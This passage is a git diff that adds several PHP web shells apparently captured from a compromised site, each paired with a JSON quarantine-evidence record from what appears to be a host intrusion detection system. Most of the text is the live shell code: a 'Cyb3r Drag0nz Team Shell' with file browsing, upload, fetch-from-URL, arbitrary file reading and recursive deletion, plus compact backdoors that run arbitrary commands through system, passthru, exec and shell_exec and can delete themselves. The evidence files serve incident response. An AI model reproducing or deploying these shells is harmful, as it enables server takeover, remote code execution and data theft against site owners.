" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json.evidence.json b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json.evidence.json new file mode 100644 index 0000000..10e4be3 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4849", + "log_excerpt": "[quarantine] www.archlinexp.eu:ko6h7s5e9kak.php7.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783381489, + "size": 10657, + "uid": 20043 + }, + "rel_path": "ko6h7s5e9kak.php7.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json.evidence.json b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json.evidence.json new file mode 100644 index 0000000..b6b3415 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4877", + "log_excerpt": "[quarantine] www.archlinexp.eu:ko6h7s5e9kak.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783381487, + "size": 10657, + "uid": 20043 + }, + "rel_path": "ko6h7s5e9kak.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..d5dea98 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5214", + "log_excerpt": "[quarantine] www.archlinexp.eu:language/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353230, + "size": 10657, + "uid": 20043 + }, + "rel_path": "language/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..b04aa71 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5305", + "log_excerpt": "[quarantine] www.archlinexp.eu:logs/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353220, + "size": 10657, + "uid": 20043 + }, + "rel_path": "logs/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json b/var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json.evidence.json new file mode 100644 index 0000000..8d88b47 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5307", + "log_excerpt": "[quarantine] www.archlinexp.eu:logs/yhajxaav.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346951, + "size": 10657, + "uid": 20043 + }, + "rel_path": "logs/yhajxaav.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/media/50nnp2o4xt.php.json b/var/www/hosting/archlinexp.eu/www/media/50nnp2o4xt.php.json new file mode 100644 index 0000000..0d0bf2f --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/50nnp2o4xt.php.json @@ -0,0 +1,6 @@ +
+
\ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/media/50nnp2o4xt.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/media/50nnp2o4xt.php.json.evidence.json new file mode 100644 index 0000000..bc337a4 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/50nnp2o4xt.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "7191", + "log_excerpt": "[quarantine] www.archlinexp.eu:media/50nnp2o4xt.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/media/50nnp2o4xt.php.json)", + "original_sha256": "ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1", + "original_stat": { + "gid": 30037, + "mtime": 1784278956, + "size": 298, + "uid": 20043 + }, + "rel_path": "media/50nnp2o4xt.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json b/var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json new file mode 100644 index 0000000..711797a --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json.evidence.json new file mode 100644 index 0000000..64d127c --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4984", + "log_excerpt": "[quarantine] www.archlinexp.eu:media/c_03e0fd55.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json)", + "original_sha256": "65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d", + "original_stat": { + "gid": 30037, + "mtime": 1783194679, + "size": 762, + "uid": 20043 + }, + "rel_path": "media/c_03e0fd55.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/media/c_7f0b46f9.php.json b/var/www/hosting/archlinexp.eu/www/media/c_7f0b46f9.php.json new file mode 100644 index 0000000..3b8ccaa --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/c_7f0b46f9.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/media/c_7f0b46f9.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/media/c_7f0b46f9.php.json.evidence.json new file mode 100644 index 0000000..ff46a58 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/c_7f0b46f9.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4991", + "log_excerpt": "[quarantine] www.archlinexp.eu:media/c_7f0b46f9.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/media/c_7f0b46f9.php.json)", + "original_sha256": "602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8", + "original_stat": { + "gid": 30037, + "mtime": 1783201887, + "size": 762, + "uid": 20043 + }, + "rel_path": "media/c_7f0b46f9.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/media/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/media/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

